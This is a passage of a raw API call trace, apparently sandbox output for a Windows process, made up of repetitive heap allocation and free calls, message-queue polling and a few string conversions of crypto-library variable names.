lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0238.029] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0238.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0238.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0238.030] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0238.030] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0238.030] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0238.030] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0238.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0238.031] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0238.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0238.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0238.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.032] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0238.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0238.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.032] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.033] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.033] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0238.034] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0238.034] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.034] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0238.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0238.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0238.035] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0238.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0238.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.036] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.037] 